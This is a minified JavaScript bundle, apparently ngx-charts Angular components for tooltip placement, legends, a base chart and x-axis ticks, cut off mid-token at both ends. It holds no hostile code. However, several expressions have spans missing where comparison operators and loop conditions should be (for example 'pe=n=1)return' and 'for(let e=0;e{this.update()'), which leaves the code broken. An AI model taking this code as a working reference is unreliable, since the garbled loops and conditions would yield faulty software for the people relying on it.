arguments.length?(e=Array.from(r),n):e.slice()},n.unknown=function(r){return arguments.length?(i=r,n):i},n.copy=function(){return qI(a,e).unknown(i)},Bb.apply(n,arguments),n}function sT(){var r,c,t=qI().unknown(void 0),a=t.domain,e=t.range,i=0,n=1,d=!1,T=0,k=0,q=.5;function Y(){var te=a().length,pe=n=1)return+e(t[i-1],i-1,t);var i,n=(i-1)*a,r=Math.floor(n),c=+e(t[r],r,t);return c+(+e(t[r+1],r+1,t)-c)*(n-r)}}function iq(){var i,t=[],a=[],e=[];function n(){var c=0,d=Math.max(1,a.length);for(e=new Array(d-1);++c0?e[d-1]:t[0],d{return(t=kn||(kn={})).Top="top",t.Bottom="bottom",t.Left="left",t.Right="right",t.Center="center",kn;var t})();function oq(t,a,e){return e===kn.Top?t.top-7:e===kn.Bottom?t.top+t.height-a.height+7:e===kn.Center?t.top+t.height/2-a.height/2:void 0}function rq(t,a,e){return e===kn.Left?t.left-7:e===kn.Right?t.left+t.width-a.width+7:e===kn.Center?t.left+t.width/2-a.width/2:void 0}class Kl{static calculateVerticalAlignment(a,e,i){let n=oq(a,e,i);return n+e.height>window.innerHeight&&(n=window.innerHeight-e.height),n}static calculateVerticalCaret(a,e,i,n){let r;n===kn.Top&&(r=a.height/2-i.height/2+7),n===kn.Bottom&&(r=e.height-a.height/2-i.height/2-7),n===kn.Center&&(r=e.height/2-i.height/2);const c=oq(a,e,n);return c+e.height>window.innerHeight&&(r+=c+e.height-window.innerHeight),r}static calculateHorizontalAlignment(a,e,i){let n=rq(a,e,i);return n+e.width>window.innerWidth&&(n=window.innerWidth-e.width),n}static calculateHorizontalCaret(a,e,i,n){let r;n===kn.Left&&(r=a.width/2-i.width/2+7),n===kn.Right&&(r=e.width-a.width/2-i.width/2-7),n===kn.Center&&(r=e.width/2-i.width/2);const c=rq(a,e,n);return c+e.width>window.innerWidth&&(r+=c+e.width-window.innerWidth),r}static shouldFlip(a,e,i,n){let r=!1;return i===kn.Right&&a.left+a.width+e.width+n>window.innerWidth&&(r=!0),i===kn.Left&&a.left-e.width-n<0&&(r=!0),i===kn.Top&&a.top-e.height-n<0&&(r=!0),i===kn.Bottom&&a.top+a.height+e.height+n>window.innerHeight&&(r=!0),r}static positionCaret(a,e,i,n,r){let c=0,d=0;return a===kn.Right?(d=-7,c=Kl.calculateVerticalCaret(i,e,n,r)):a===kn.Left?(d=e.width,c=Kl.calculateVerticalCaret(i,e,n,r)):a===kn.Top?(c=e.height,d=Kl.calculateHorizontalCaret(i,e,n,r)):a===kn.Bottom&&(c=-7,d=Kl.calculateHorizontalCaret(i,e,n,r)),{top:c,left:d}}static positionContent(a,e,i,n,r){let c=0,d=0;return a===kn.Right?(d=i.left+i.width+n,c=Kl.calculateVerticalAlignment(i,e,r)):a===kn.Left?(d=i.left-e.width-n,c=Kl.calculateVerticalAlignment(i,e,r)):a===kn.Top?(c=i.top-e.height-n,d=Kl.calculateHorizontalAlignment(i,e,r)):a===kn.Bottom&&(c=i.top+i.height+n,d=Kl.calculateHorizontalAlignment(i,e,r)),{top:c,left:d}}static determinePlacement(a,e,i,n){if(Kl.shouldFlip(i,e,a,n)){if(a===kn.Right)return kn.Left;if(a===kn.Left)return kn.Right;if(a===kn.Top)return kn.Bottom;if(a===kn.Bottom)return kn.Top}return a}}let m6e=(()=>{class t{constructor(e,i,n){this.element=e,this.renderer=i,this.platformId=n}get cssClasses(){let e="ngx-charts-tooltip-content";return e+=` position-${this.placement}`,e+=` type-${this.type}`,e+=` ${this.cssClass}`,e}ngAfterViewInit(){setTimeout(this.position.bind(this))}position(){if(!ag(this.platformId))return;const e=this.element.nativeElement,i=this.host.nativeElement.getBoundingClientRect();if(!i.height&&!i.width)return;const n=e.getBoundingClientRect();this.checkFlip(i,n),this.positionContent(e,i,n),this.showCaret&&this.positionCaret(i,n),setTimeout(()=>this.renderer.addClass(e,"animate"),1)}positionContent(e,i,n){const{top:r,left:c}=Kl.positionContent(this.placement,n,i,this.spacing,this.alignment);this.renderer.setStyle(e,"top",`${r}px`),this.renderer.setStyle(e,"left",`${c}px`)}positionCaret(e,i){const n=this.caretElm.nativeElement,r=n.getBoundingClientRect(),{top:c,left:d}=Kl.positionCaret(this.placement,i,e,r,this.alignment);this.renderer.setStyle(n,"top",`${c}px`),this.renderer.setStyle(n,"left",`${d}px`)}checkFlip(e,i){this.placement=Kl.determinePlacement(this.placement,i,e,this.spacing)}onWindowResize(){this.position()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-tooltip-content"]],viewQuery:function(e,i){if(1&e&&Mi(aEe,5),2&e){let n;Vt(n=Bt())&&(i.caretElm=n.first)}},hostVars:2,hostBindings:function(e,i){1&e&&he("resize",function(){return i.onWindowResize()},0,zC),2&e&&_D(i.cssClasses)},inputs:{host:"host",showCaret:"showCaret",type:"type",placement:"placement",alignment:"alignment",spacing:"spacing",cssClass:"cssClass",title:"title",template:"template",context:"context"},decls:6,vars:6,consts:[[3,"hidden"],["caretElm",""],[1,"tooltip-content"],[4,"ngIf"],[3,"innerHTML",4,"ngIf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div"),it(1,"span",0,1),m(3,"div",2),ne(4,rEe,2,4,"span",3),ne(5,sEe,1,1,"span",4),u()()),2&e&&(g(1),Dv("tooltip-caret position-",i.placement,""),F("hidden",!i.showCaret),g(3),F("ngIf",!i.title),g(1),F("ngIf",i.title))},dependencies:[Ri,_1],styles:[".ngx-charts-tooltip-content{position:fixed;border-radius:3px;z-index:5000;display:block;font-weight:400;opacity:0;pointer-events:none!important}.ngx-charts-tooltip-content.type-popover{background:#fff;color:#060709;border:1px solid #72809b;box-shadow:0 1px 3px #0003,0 1px 1px #00000024,0 2px 1px -1px #0000001f;font-size:13px;padding:4px}.ngx-charts-tooltip-content.type-popover .tooltip-caret{position:absolute;z-index:5001;width:0;height:0}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-left{border-top:7px solid transparent;border-bottom:7px solid transparent;border-left:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-top{border-left:7px solid transparent;border-right:7px solid transparent;border-top:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-right{border-top:7px solid transparent;border-bottom:7px solid transparent;border-right:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-bottom{border-left:7px solid transparent;border-right:7px solid transparent;border-bottom:7px solid #fff}.ngx-charts-tooltip-content.type-tooltip{color:#fff;background:rgba(0,0,0,.75);font-size:12px;padding:0 10px;text-align:center;pointer-events:auto}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-left{border-top:7px solid transparent;border-bottom:7px solid transparent;border-left:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-top{border-left:7px solid transparent;border-right:7px solid transparent;border-top:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-right{border-top:7px solid transparent;border-bottom:7px solid transparent;border-right:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-bottom{border-left:7px solid transparent;border-right:7px solid transparent;border-bottom:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content .tooltip-label{display:block;line-height:1em;padding:8px 5px 5px;font-size:1em}.ngx-charts-tooltip-content .tooltip-val{display:block;font-size:1.3em;line-height:1em;padding:0 5px 8px}.ngx-charts-tooltip-content .tooltip-caret{position:absolute;z-index:5001;width:0;height:0}.ngx-charts-tooltip-content.position-right{transform:translate(10px)}.ngx-charts-tooltip-content.position-left{transform:translate(-10px)}.ngx-charts-tooltip-content.position-top{transform:translateY(-10px)}.ngx-charts-tooltip-content.position-bottom{transform:translateY(10px)}.ngx-charts-tooltip-content.animate{opacity:1;transition:opacity .3s,transform .3s;transform:translate(0);pointer-events:auto}.area-tooltip-container{padding:5px 0;pointer-events:none}.tooltip-item{text-align:left;line-height:1.2em;padding:5px 0}.tooltip-item .tooltip-item-color{display:inline-block;height:12px;width:12px;margin-right:5px;color:#5b646b;border-radius:3px}\n"],encapsulation:2}),function Ve(t,a,e,i){var c,n=arguments.length,r=n<3?a:null===i?i=Object.getOwnPropertyDescriptor(a,e):i;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)r=Reflect.decorate(t,a,e,i);else for(var d=t.length-1;d>=0;d--)(c=t[d])&&(r=(n<3?c(r):n>3?c(a,e,r):c(a,e))||r);n>3&&r&&Object.defineProperty(a,e,r)}([d6e(100)],t.prototype,"onWindowResize",null),t})(),sq=(()=>{class t{constructor(e,i,n){this.applicationRef=e,this.componentFactoryResolver=i,this.injector=n}static setGlobalRootViewContainer(e){t.globalRootViewContainer=e}getRootViewContainer(){if(this._container)return this._container;if(t.globalRootViewContainer)return t.globalRootViewContainer;if(this.applicationRef.components.length)return this.applicationRef.components[0];throw new Error("View Container not found! ngUpgrade needs to manually set this via setRootViewContainer or setGlobalRootViewContainer.")}setRootViewContainer(e){this._container=e}getComponentRootNode(e){return function h6e(t){return t.element}(e)?e.element.nativeElement:e.hostView&&e.hostView.rootNodes.length>0?e.hostView.rootNodes[0]:e.location.nativeElement}getRootViewContainerNode(e){return this.getComponentRootNode(e)}projectComponentBindings(e,i){if(i){if(void 0!==i.inputs){const n=Object.getOwnPropertyNames(i.inputs);for(const r of n)e.instance[r]=i.inputs[r]}if(void 0!==i.outputs){const n=Object.getOwnPropertyNames(i.outputs);for(const r of n)e.instance[r]=i.outputs[r]}}return e}appendComponent(e,i={},n){n||(n=this.getRootViewContainer());const r=this.getComponentRootNode(n),c=new Zw(r,this.componentFactoryResolver,this.applicationRef,this.injector),d=new hp(e),T=c.attach(d);return this.projectComponentBindings(T,i),T}}return t.globalRootViewContainer=null,t.\u0275fac=function(e){return new(e||t)(At(Yf),At(On),At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),GI=(()=>{class t extends class u6e{constructor(a){this.injectionService=a,this.defaults={},this.components=new Map}getByType(a=this.type){return this.components.get(a)}create(a){return this.createByType(this.type,a)}createByType(a,e){e=this.assignDefaults(e);const i=this.injectComponent(a,e);return this.register(a,i),i}destroy(a){const e=this.components.get(a.componentType);if(e&&e.length){const i=e.indexOf(a);i>-1&&(e[i].destroy(),e.splice(i,1))}}destroyAll(){this.destroyByType(this.type)}destroyByType(a){const e=this.components.get(a);if(e&&e.length){let i=e.length-1;for(;i>=0;)this.destroy(e[i--])}}injectComponent(a,e){return this.injectionService.appendComponent(a,e)}assignDefaults(a){const e=Object.assign({},this.defaults.inputs),i=Object.assign({},this.defaults.outputs);return!a.inputs&&!a.outputs&&(a={inputs:a}),e&&(a.inputs=Object.assign(Object.assign({},e),a.inputs)),i&&(a.outputs=Object.assign(Object.assign({},i),a.outputs)),a}register(a,e){this.components.has(a)||this.components.set(a,[]),this.components.get(a).push(e)}}{constructor(e){super(e),this.type=m6e}}return t.\u0275fac=function(e){return new(e||t)(At(sq))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();var Su=(()=>{return(t=Su||(Su={})).Right="right",t.Below="below",Su;var t})(),Pg=(()=>{return(t=Pg||(Pg={})).ScaleLegend="scaleLegend",t.Legend="legend",Pg;var t})(),Wa=(()=>{return(t=Wa||(Wa={})).Time="time",t.Linear="linear",t.Ordinal="ordinal",t.Quantile="quantile",Wa;var t})();let cq=(()=>{class t{constructor(){this.horizontal=!1}ngOnChanges(e){const i=this.gradientString(this.colors.range(),this.colors.domain());this.gradient=`linear-gradient(to ${this.horizontal?"right":"bottom"}, ${i})`}gradientString(e,i){i.push(1);const n=[];return e.reverse().forEach((r,c)=>{n.push(`${r} ${Math.round(100*i[c])}%`)}),n.join(", ")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-scale-legend"]],inputs:{valueRange:"valueRange",colors:"colors",height:"height",width:"width",horizontal:"horizontal"},features:[sa],decls:8,vars:10,consts:[[1,"scale-legend"],[1,"scale-legend-label"],[1,"scale-legend-wrap"]],template:function(e,i){1&e&&(m(0,"div",0)(1,"div",1)(2,"span"),s(3),u()(),it(4,"div",2),m(5,"div",1)(6,"span"),s(7),u()()()),2&e&&(ri("height",i.horizontal?void 0:i.height,"px")("width",i.width,"px"),Ct("horizontal-legend",i.horizontal),g(3),ke(i.valueRange[1].toLocaleString()),g(1),ri("background",i.gradient),g(3),ke(i.valueRange[0].toLocaleString()))},styles:[".chart-legend{display:inline-block;padding:0;width:auto!important}.chart-legend .scale-legend{text-align:center;display:flex;flex-direction:column}.chart-legend .scale-legend-wrap{display:inline-block;flex:1;width:30px;border-radius:5px;margin:0 auto}.chart-legend .scale-legend-label{font-size:12px}.chart-legend .horizontal-legend.scale-legend{flex-direction:row}.chart-legend .horizontal-legend .scale-legend-wrap{width:auto;height:30px;margin:0 16px}\n"],encapsulation:2,changeDetection:0}),t})();function Ub(t){return t instanceof Date?t.toLocaleDateString():t.toLocaleString()}let lq=(()=>{class t{constructor(){this.isActive=!1,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.toggle=new Tt}get trimmedLabel(){return this.formattedLabel||"(empty)"}onMouseEnter(){this.activate.emit({name:this.label})}onMouseLeave(){this.deactivate.emit({name:this.label})}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-legend-entry"]],hostBindings:function(e,i){1&e&&he("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(){return i.onMouseLeave()})},inputs:{color:"color",label:"label",formattedLabel:"formattedLabel",isActive:"isActive"},outputs:{select:"select",activate:"activate",deactivate:"deactivate",toggle:"toggle"},decls:4,vars:6,consts:[["tabindex","-1",3,"title","click"],[1,"legend-label-color",3,"click"],[1,"legend-label-text"]],template:function(e,i){1&e&&(m(0,"span",0),he("click",function(){return i.select.emit(i.formattedLabel)}),m(1,"span",1),he("click",function(){return i.toggle.emit(i.formattedLabel)}),u(),m(2,"span",2),s(3),u()()),2&e&&(Ct("active",i.isActive),F("title",i.formattedLabel),g(1),ri("background-color",i.color),g(2),ct(" ",i.trimmedLabel," "))},encapsulation:2,changeDetection:0}),t})(),dq=(()=>{class t{constructor(e){this.cd=e,this.horizontal=!1,this.labelClick=new Tt,this.labelActivate=new Tt,this.labelDeactivate=new Tt,this.legendEntries=[]}ngOnChanges(e){this.update()}update(){this.cd.markForCheck(),this.legendEntries=this.getLegendEntries()}getLegendEntries(){const e=[];for(const i of this.data){const n=Ub(i);-1===e.findIndex(c=>c.label===n)&&e.push({label:i,formattedLabel:n,color:this.colors.getColor(i)})}return e}isActive(e){return!!this.activeEntries&&void 0!==this.activeEntries.find(n=>e.label===n.name)}activate(e){this.labelActivate.emit(e)}deactivate(e){this.labelDeactivate.emit(e)}trackBy(e,i){return i.label}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-legend"]],inputs:{data:"data",title:"title",colors:"colors",height:"height",width:"width",activeEntries:"activeEntries",horizontal:"horizontal"},outputs:{labelClick:"labelClick",labelActivate:"labelActivate",labelDeactivate:"labelDeactivate"},features:[sa],decls:5,vars:9,consts:[["class","legend-title",4,"ngIf"],[1,"legend-wrap"],[1,"legend-labels"],["class","legend-label",4,"ngFor","ngForOf","ngForTrackBy"],[1,"legend-title"],[1,"legend-title-text"],[1,"legend-label"],[3,"label","formattedLabel","color","isActive","select","activate","deactivate"]],template:function(e,i){1&e&&(m(0,"div"),ne(1,cEe,3,1,"header",0),m(2,"div",1)(3,"ul",2),ne(4,lEe,2,4,"li",3),u()()()),2&e&&(ri("width",i.width,"px"),g(1),F("ngIf",(null==i.title?null:i.title.length)>0),g(2),ri("max-height",i.height-45,"px"),Ct("horizontal-legend",i.horizontal),g(1),F("ngForOf",i.legendEntries)("ngForTrackBy",i.trackBy))},dependencies:[lq,Ri,Zi],styles:[".chart-legend{display:inline-block;padding:0;width:auto!important}.chart-legend .legend-title{white-space:nowrap;overflow:hidden;margin-left:10px;margin-bottom:5px;font-size:14px;font-weight:700}.chart-legend ul,.chart-legend li{padding:0;margin:0;list-style:none}.chart-legend .horizontal-legend li{display:inline-block}.chart-legend .legend-wrap{width:calc(100% - 10px)}.chart-legend .legend-labels{line-height:85%;list-style:none;text-align:left;float:left;width:100%;border-radius:3px;overflow-y:auto;overflow-x:hidden;white-space:nowrap;background:rgba(0,0,0,.05)}.chart-legend .legend-label{cursor:pointer;font-size:90%;margin:8px;color:#afb7c8}.chart-legend .legend-label:hover{color:#000;transition:.2s}.chart-legend .legend-label .active .legend-label-text{color:#000}.chart-legend .legend-label-color{display:inline-block;height:15px;width:15px;margin-right:5px;color:#5b646b;border-radius:3px}.chart-legend .legend-label-text{display:inline-block;vertical-align:top;line-height:15px;font-size:12px;width:calc(100% - 20px);text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.chart-legend .legend-title-text{vertical-align:bottom;display:inline-block;line-height:16px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}\n"],encapsulation:2,changeDetection:0}),t})(),mq=(()=>{class t{constructor(){this.showLegend=!1,this.animations=!0,this.legendLabelClick=new Tt,this.legendLabelActivate=new Tt,this.legendLabelDeactivate=new Tt,this.LegendPosition=Su,this.LegendType=Pg}ngOnChanges(e){this.update()}update(){let e=0;this.showLegend&&(this.legendType=this.getLegendType(),(!this.legendOptions||this.legendOptions.position===Su.Right)&&(e=this.legendType===Pg.ScaleLegend?1:2)),this.chartWidth=Math.floor(this.view[0]*(12-e)/12),this.legendWidth=this.legendOptions&&this.legendOptions.position!==Su.Right?this.chartWidth:Math.floor(this.view[0]*e/12)}getLegendType(){return this.legendOptions.scaleType===Wa.Linear?Pg.ScaleLegend:Pg.Legend}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-chart"]],inputs:{view:"view",showLegend:"showLegend",legendOptions:"legendOptions",legendType:"legendType",activeEntries:"activeEntries",animations:"animations"},outputs:{legendLabelClick:"legendLabelClick",legendLabelActivate:"legendLabelActivate",legendLabelDeactivate:"legendLabelDeactivate"},features:[ki([GI]),sa],ngContentSelectors:aq,decls:5,vars:6,consts:[[1,"ngx-charts-outer"],[1,"ngx-charts"],["class","chart-legend",3,"horizontal","valueRange","colors","height","width",4,"ngIf"],["class","chart-legend",3,"horizontal","data","title","colors","height","width","activeEntries","labelClick","labelActivate","labelDeactivate",4,"ngIf"],[1,"chart-legend",3,"horizontal","valueRange","colors","height","width"],[1,"chart-legend",3,"horizontal","data","title","colors","height","width","activeEntries","labelClick","labelActivate","labelDeactivate"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0),fi(),m(1,"svg",1),va(2),u(),ne(3,dEe,1,5,"ngx-charts-scale-legend",2),ne(4,mEe,1,7,"ngx-charts-legend",3),u()),2&e&&(ri("width",i.view[0],"px"),g(1),Rt("width",i.chartWidth)("height",i.view[1]),g(2),F("ngIf",i.showLegend&&i.legendType===i.LegendType.ScaleLegend),g(1),F("ngIf",i.showLegend&&i.legendType===i.LegendType.Legend))},dependencies:[cq,dq,Ri],encapsulation:2,changeDetection:0}),t})(),f6e=(()=>{class t{constructor(e,i){this.element=e,this.zone=i,this.visible=new Tt,this.isVisible=!1,this.runCheck()}destroy(){clearTimeout(this.timeout)}onVisibilityChange(){this.zone.run(()=>{this.isVisible=!0,this.visible.emit(!0)})}runCheck(){const e=()=>{if(!this.element)return;const{offsetHeight:i,offsetWidth:n}=this.element.nativeElement;i&&n?(clearTimeout(this.timeout),this.onVisibilityChange()):(clearTimeout(this.timeout),this.zone.runOutsideAngular(()=>{this.timeout=setTimeout(()=>e(),100)}))};this.zone.runOutsideAngular(()=>{this.timeout=setTimeout(()=>e())})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["visibility-observer"]],outputs:{visible:"visible"}}),t})();function uq(t){return"[object Date]"===toString.call(t)}let hq=(()=>{class t{constructor(e,i,n,r){this.chartElement=e,this.zone=i,this.cd=n,this.platformId=r,this.scheme="cool",this.schemeType=Wa.Ordinal,this.animations=!0,this.select=new Tt}ngOnInit(){Zv(this.platformId)&&(this.animations=!1)}ngAfterViewInit(){this.bindWindowResizeEvent(),this.visibilityObserver=new f6e(this.chartElement,this.zone),this.visibilityObserver.visible.subscribe(this.update.bind(this))}ngOnDestroy(){this.unbindEvents(),this.visibilityObserver&&(this.visibilityObserver.visible.unsubscribe(),this.visibilityObserver.destroy())}ngOnChanges(e){this.update()}update(){if(this.results=this.results?this.cloneData(this.results):[],this.view)this.width=this.view[0],this.height=this.view[1];else{const e=this.getContainerDims();e&&(this.width=e.width,this.height=e.height)}this.width||(this.width=600),this.height||(this.height=400),this.width=Math.floor(this.width),this.height=Math.floor(this.height),this.cd&&this.cd.markForCheck()}getContainerDims(){let e,i;const n=this.chartElement.nativeElement;if(ag(this.platformId)&&null!==n.parentNode){const r=n.parentNode.getBoundingClientRect();e=r.width,i=r.height}return e&&i?{width:e,height:i}:null}formatDates(){for(let e=0;e{this.update(),this.cd&&this.cd.markForCheck()});this.resizeSubscription=i}cloneData(e){const i=[];for(const n of e){const r={name:n.name};if(void 0!==n.value&&(r.value=n.value),void 0!==n.series){r.series=[];for(const c of n.series){const d=Object.assign({},c);r.series.push(d)}}void 0!==n.extra&&(r.extra=JSON.parse(JSON.stringify(n.extra))),i.push(r)}return i}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(Ma),Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["base-chart"]],inputs:{results:"results",view:"view",scheme:"scheme",schemeType:"schemeType",customColors:"customColors",animations:"animations"},outputs:{select:"select"},features:[sa],decls:1,vars:0,template:function(e,i){1&e&&it(0,"div")},encapsulation:2}),t})();var Fs=(()=>{return(t=Fs||(Fs={})).Top="top",t.Bottom="bottom",t.Left="left",t.Right="right",Fs;var t})();let fq=(()=>{class t{constructor(e){this.textHeight=25,this.margin=5,this.element=e.nativeElement}ngOnChanges(e){this.update()}update(){switch(this.strokeWidth="0.01",this.textAnchor="middle",this.transform="",this.orient){case Fs.Top:case Fs.Bottom:this.y=this.offset,this.x=this.width/2;break;case Fs.Left:this.y=-(this.offset+this.textHeight+this.margin),this.x=-this.height/2,this.transform="rotate(270)";break;case Fs.Right:this.y=this.offset+this.margin,this.x=-this.height/2,this.transform="rotate(270)"}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-axis-label",""]],inputs:{orient:"orient",label:"label",offset:"offset",width:"width",height:"height"},features:[sa],attrs:uEe,decls:2,vars:6,template:function(e,i){1&e&&(fi(),m(0,"text"),s(1),u()),2&e&&(Rt("stroke-width",i.strokeWidth)("x",i.x)("y",i.y)("text-anchor",i.textAnchor)("transform",i.transform),g(1),ct(" ",i.label," "))},encapsulation:2,changeDetection:0}),t})();function QI(t,a=16){return"string"!=typeof t?"number"==typeof t?t+"":"":(t=t.trim()).length<=a?t:`${t.slice(0,a)}...`}function pq(t,a){if(t.length>a){const e=[],i=Math.floor(t.length/a);for(let n=0;n{return(t=km||(km={})).Start="start",t.Middle="middle",t.End="end",km;var t})();let _q=(()=>{class t{constructor(e){this.platformId=e,this.tickArguments=[5],this.tickStroke="#ccc",this.trimTicks=!0,this.maxTickLength=16,this.showGridLines=!1,this.rotateTicks=!0,this.dimensionsChanged=new Tt,this.verticalSpacing=20,this.rotateLabels=!1,this.innerTickSize=6,this.outerTickSize=6,this.tickPadding=3,this.textAnchor=km.Middle,this.maxTicksLength=0,this.maxAllowedLength=16,this.height=0,this.approxHeight=10}ngOnChanges(e){this.update()}ngAfterViewInit(){setTimeout(()=>this.updateDims())}updateDims(){if(!ag(this.platformId))return void this.dimensionsChanged.emit({height:this.approxHeight});const e=parseInt(this.ticksElement.nativeElement.getBoundingClientRect().height,10);e!==this.height&&(this.height=e,this.dimensionsChanged.emit({height:this.height}),setTimeout(()=>this.updateDims()))}update(){const e=this.scale;this.ticks=this.getTicks(),this.tickFormat=this.tickFormatting?this.tickFormatting:e.tickFormat?e.tickFormat.apply(e,this.tickArguments):function(n){return"Date"===n.constructor.name?n.toLocaleDateString():n.toLocaleString()};const i=this.rotateTicks?this.getRotationAngle(this.ticks):null;this.adjustedScale=this.scale.bandwidth?function(n){return this.scale(n)+.5*this.scale.bandwidth()}:this.scale,this.textTransform="",i&&0!==i?(this.textTransform=`rotate(${i})`,this.textAnchor=km.End,this.verticalSpacing=10):this.textAnchor=km.Middle,setTimeout(()=>this.updateDims())}getRotationAngle(e){let i=0;this.maxTicksLength=0;for(let k=0;kthis.maxTicksLength&&(this.maxTicksLength=Y)}const c=7*Math.min(this.maxTicksLength,this.maxAllowedLength);let d=c;const T=Math.floor(this.width/e.length);for(;d>T&&i>-90;)i-=30,d=Math.cos(i*(Math.PI/180))*c;return this.approxHeight=Math.max(Math.abs(Math.sin(i*(Math.PI/180))*c),10),i}getTicks(){let e;const i=this.getMaxTicks(20),n=this.getMaxTicks(100);return this.tickValues?e=this.tickValues:this.scale.ticks?e=this.scale.ticks.apply(this.scale,[n]):(e=this.scale.domain(),e=pq(e,i)),e}getMaxTicks(e){return Math.floor(this.width/e)}tickTransform(e){return"translate("+this.adjustedScale(e)+","+this.verticalSpacing+")"}gridLineTransform(){return`translate(0,${-this.verticalSpacing-5})`}tickTrim(e){return this.trimTicks?QI(e,this.maxTickLength):e}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-x-axis-ticks",""]],viewQuery:function(e,i){if(1&e&&Mi(nq,5),2&e){let n;Vt(n=Bt())&&(i.ticksElement=n.first)}},inputs:{scale:"scale",orient:"orient",tickArguments:"tickArguments",tickValues:"tickValues",tickStroke:"tickStroke",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",gridLineHeight:"gridLineHeight",width:"width",rotateTicks:"rotateTicks"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:hEe,decls:4,vars:2,consts:[["ticksel",""],["class","tick",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],[1,"tick"],["stroke-width","0.01"],[4,"ngIf"],["y2","0",1,"gridline-path","gridline-path-vertical"]],template:function(e,i){1&e&&(fi(),m(0,"g",null,0),ne(2,fEe,5,7,"g",1),u(),ne(3,_Ee,2,2,"g",2)),2&e&&(g(2),F("ngForOf",i.ticks),g(1),F("ngForOf",i.ticks))},dependencies:[Zi,Ri],encapsulation:2,changeDetection:0}),t})(),p6e=(()=>{class t{constructor(){this.rotateTicks=!0,this.showGridLines=!1,this.xOrient=Fs.Bottom,this.xAxisOffset=0,this.dimensionsChanged=new Tt,this.xAxisClassName="x axis",this.labelOffset=0,this.fill="none",this.stroke="stroke",this.tickStroke="#ccc",this.strokeWidth="none",this.padding=5,this.orientation=Fs}ngOnChanges(e){this.update()}update(){this.transform=`translate(0,${this.xAxisOffset+this.padding+this.dims.height})`,void 0!==this.xAxisTickCount&&(this.tickArguments=[this.xAxisTickCount])}emitTicksHeight({height:e}){const i=e+25+5;i!==this.labelOffset&&(this.labelOffset=i,setTimeout(()=>{this.dimensionsChanged.emit({height:e})},0))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-x-axis",""]],viewQuery:function(e,i){if(1&e&&Mi(_q,5),2&e){let n;Vt(n=Bt())&&(i.ticksComponent=n.first)}},inputs:{xScale:"xScale",dims:"dims",trimTicks:"trimTicks",rotateTicks:"rotateTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",showLabel:"showLabel",labelText:"labelText",ticks:"ticks",xAxisTickCount:"xAxisTickCount",xOrient:"xOrient",xAxisOffset:"xAxisOffset"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:gEe,decls:3,vars:4,consts:[["ngx-charts-x-axis-ticks","",3,"trimTicks","rotateTicks","maxTickLength","tickFormatting","tickArguments","tickStroke","scale","orient","showGridLines","gridLineHeight","width","tickValues","dimensionsChanged",4,"ngIf"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width",4,"ngIf"],["ngx-charts-x-axis-ticks","",3,"trimTicks","rotateTicks","maxTickLength","tickFormatting","tickArguments","tickStroke","scale","orient","showGridLines","gridLineHeight","width","tickValues","dimensionsChanged"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width"]],template:function(e,i){1&e&&(fi(),m(0,"g"),ne(1,CEe,1,12,"g",0),ne(2,yEe,1,5,"g",1),u()),2&e&&(Rt("class",i.xAxisClassName)("transform",i.transform),g(1),F("ngIf",i.xScale),g(1),F("ngIf",i.showLabel))},dependencies:[_q,fq,Ri],encapsulation:2,changeDetection:0}),t})();function wp(t,a,e,i,n,[r,c,d,T]){let k="";return k=`M${[t+n,a]}`,k+="h"+((e=0===(e=Math.floor(e))?1:e)-2*n),k+=c?`a${[n,n]} 0 0 1 ${[n,n]}`:`h${n}v${n}`,k+="v"+((i=0===(i=Math.floor(i))?1:i)-2*n),k+=T?`a${[n,n]} 0 0 1 ${[-n,n]}`:`v${n}h${-n}`,k+="h"+(2*n-e),k+=d?`a${[n,n]} 0 0 1 ${[-n,-n]}`:`h${-n}v${-n}`,k+="v"+(2*n-i),k+=r?`a${[n,n]} 0 0 1 ${[n,-n]}`:`v${-n}h${n}`,k+="z",k}let 